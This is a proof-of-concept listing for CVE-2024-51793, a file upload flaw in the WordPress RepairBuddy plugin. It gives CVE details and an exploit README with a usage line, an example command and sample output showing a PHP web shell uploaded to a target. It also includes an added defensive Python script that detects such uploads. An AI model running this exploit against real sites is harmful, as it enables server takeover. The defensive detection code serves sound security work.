POC details: ea61507d99b82a3e2defe988667a44c4cfcabfbe

Source
Related vulnerability
Title: WordPress plugin Computer Repair Shop code issue vulnerability (CVE-2024-51793)
Description: WordPress and WordPress plugins are both products of the WordPress Foundation. WordPress is a blogging platform written in PHP; it lets a personal blog be hosted on a server running PHP and MySQL. A WordPress plugin is an add-on application for that platform. WordPress plugin Computer Repair Shop versions 3.8115 and earlier contain a code issue vulnerability, which stems from an unrestricted upload of a file with a dangerous type.
Description
 WordPress RepairBuddy plugin <= 3.8115 - Arbitrary File Upload vulnerability
Introduction
# 🛡️ WordPress RepairBuddy Plugin Exploit

## 📜 CVE Information

**CVE-ID:** CVE-2024-51793  
**Published:** 2024-11-11  
**Updated:** 2024-11-11  
**Title:** WordPress RepairBuddy plugin <= 3.8115 - Arbitrary File Upload vulnerability  
**Description:**  
Unrestricted Upload of File with Dangerous Type vulnerability in Webful Creations Computer Repair Shop allows Upload a Web Shell to a Web Server. This issue affects Computer Repair Shop: from n/a through 3.8115.

**CWE:**  
- [CWE-434: Unrestricted Upload of File with Dangerous Type](https://cwe.mitre.org/data/definitions/434.html)

**CVSS:**  
- **Score:** 10.0 (CRITICAL)
- **Version:** 3.1
- **Vector String:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

## 📋 Description

This is a proof of concept exploit for the Arbitrary File Upload vulnerability in the WordPress RepairBuddy plugin versions <= 3.8115. The exploit allows an attacker to upload a web shell to the vulnerable server.

## ⚙️ Requirements

- Python 3.x
- `requests` library (`pip install requests`)

## 🚀 Usage

```shell
usage: CVE-2024-51793.py [-h] -u URL [-shell SHELL]

WordPress RepairBuddy plugin <= 3.8115 - Arbitrary File Upload vulnerability # By Nxploited ,Khaled alenazi.

options:
  -h, --help     show this help message and exit
  -u, --url URL  Target URL
  -shell SHELL   Shell code to upload
```

## 📖 Example

```shell
python CVE-2024-51793.py -u http://target.com/wordpress
```

## 📝 Output

```text
Exploit By : Nxploit Khaled Alenazi,

🎯 The site is vulnerable. Proceeding with the exploit...
Response: "<a href=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" target=\"_blank\"><img src=\"http:\/\/target\/wordpress\/wp-content\/plugins\/computer-repair-shop\/assets\/images\/attachment.png\" class=\"\" \/><\/a><input type=\"hidden\" name=\"repairBuddAttachment_file[]\" value=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" \/>"
✅ Shell uploaded successfully.
🔗 Shell URL: http://target/wordpress/wp-content/repairbuddy_uploads/reciepts/2025_03_23_22_43_50nxploit.php
```
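The output above shows what a successful upload looks like from the server's side: the plugin answers with HTML whose `href` and hidden `repairBuddAttachment_file[]` value both point at a `.php` file under `wp-content/repairbuddy_uploads/`. As an added defensive example (not code from the PoC repository or from the plugin), the following Python turns that observation into checks a site owner can run: it extracts the URLs from such a response and flags executable ones, scans access-log lines for requests that reach an executable file in that directory, and walks an on-disk install for the same condition. The upload directory and the sample response body are taken from the output above; the extension list, the combined-log format and the sample log lines are constructed assumptions.

```python
"""Defensive check for executable files dropped under the RepairBuddy upload directory.

Added example, not code from the PoC repository or from the plugin. The upload
directory and the sample response body come from the PoC output above; the
extension list, the access-log format and the log lines are constructed
assumptions for illustration.
"""
import re
from pathlib import Path
from urllib.parse import unquote, urlsplit

# Directory the plugin writes receipt attachments into (path from the PoC output above)
UPLOAD_DIR = "/wp-content/repairbuddy_uploads/"
# Extensions a PHP-enabled web server would execute (assumed list; extend per server config)
DANGEROUS_EXTS = {"php", "phtml", "php3", "php4", "php5", "php7", "phps", "phar", "pht"}


def is_dangerous_upload(url_or_path: str) -> bool:
    """True when the target is a file under UPLOAD_DIR carrying an executable extension.

    Every dotted suffix of the file name is checked, so "shell.php.jpg" is flagged
    too, because some Apache AddHandler configurations execute double extensions.
    """
    path = unquote(urlsplit(url_or_path).path).lower()  # drops scheme, host and query
    if UPLOAD_DIR not in path:
        return False
    filename = path.rsplit("/", 1)[-1]
    return any(ext in DANGEROUS_EXTS for ext in filename.split(".")[1:])


# URL inside the unescaped plugin response; stops at quotes, backslashes, whitespace, tags
_URL_RE = re.compile(r'https?://[^"\\\s<>]+')


def extract_upload_urls(response_body: str) -> list:
    """Return the distinct URLs inside the plugin's JSON-escaped HTML response."""
    unescaped = response_body.replace("\\/", "/")  # the body escapes slashes as \/
    return sorted(set(_URL_RE.findall(unescaped)))


def flag_response(response_body: str) -> list:
    """URLs in an upload response that point at executable files in UPLOAD_DIR."""
    return [u for u in extract_upload_urls(response_body) if is_dangerous_upload(u)]


# Apache/nginx combined log format (assumed); captures method, request path and status
_LOG_RE = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def scan_access_log(lines) -> list:
    """(method, path, status) for each request that reaches an executable file in UPLOAD_DIR."""
    hits = []
    for line in lines:
        m = _LOG_RE.match(line)
        if m and is_dangerous_upload(m["path"]):
            hits.append((m["method"], m["path"], int(m["status"])))
    return hits


def find_executable_uploads(wordpress_root) -> list:
    """Walk an on-disk WordPress install and list executable files under UPLOAD_DIR."""
    root = Path(wordpress_root)
    return sorted(
        str(p) for p in root.rglob("*")
        if p.is_file() and is_dangerous_upload(p.as_posix())
    )


# Constructed sample: the response body shown in the PoC output above (JSON-escaped HTML)
SAMPLE_RESPONSE = (
    r'<a href=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/'
    r'2025_03_23_22_43_50nxploit.php\" target=\"_blank\"><img src=\"http:\/\/target\/wordpress\/'
    r'wp-content\/plugins\/computer-repair-shop\/assets\/images\/attachment.png\" class=\"\" \/><\/a>'
    r'<input type=\"hidden\" name=\"repairBuddAttachment_file[]\" value=\"http:\/\/target\/wordpress\/'
    r'wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" \/>'
)

# Constructed sample access-log lines (combined log format); only the first one is a hit
SAMPLE_LOG = [
    '203.0.113.7 - - [23/Mar/2025:22:43:52 +0000] "GET /wordpress/wp-content/repairbuddy_uploads/reciepts/2025_03_23_22_43_50nxploit.php?v=1 HTTP/1.1" 200 87 "-" "python-requests/2.31"',
    '198.51.100.9 - - [23/Mar/2025:22:44:10 +0000] "GET /wordpress/wp-content/repairbuddy_uploads/reciepts/invoice_1042.pdf HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [23/Mar/2025:22:44:11 +0000] "GET /wordpress/wp-content/plugins/computer-repair-shop/assets/images/attachment.png HTTP/1.1" 200 1120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for url in flag_response(SAMPLE_RESPONSE):
        print("executable file accepted by upload handler:", url)
    for method, path, status in scan_access_log(SAMPLE_LOG):
        print(f"request to executable upload: {method} {path} -> {status}")
```

Point `find_executable_uploads` at the WordPress document root on the server; any hit is a file the web server may execute and should be quarantined and reviewed. The extension check is deliberately case-insensitive and looks at every suffix, because an upload filter that only compares the final lowercase extension is exactly the kind of check this class of bug slips past.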

## 👨‍💻 Author

Exploit By: Nxploited, Khaled Alenazi
File snapshot

```text
[4.0K] /data/pocs/ea61507d99b82a3e2defe988667a44c4cfcabfbe
├── [4.9K] CVE-2024-51793.py
└── [2.2K] README.md

0 directories, 2 files
```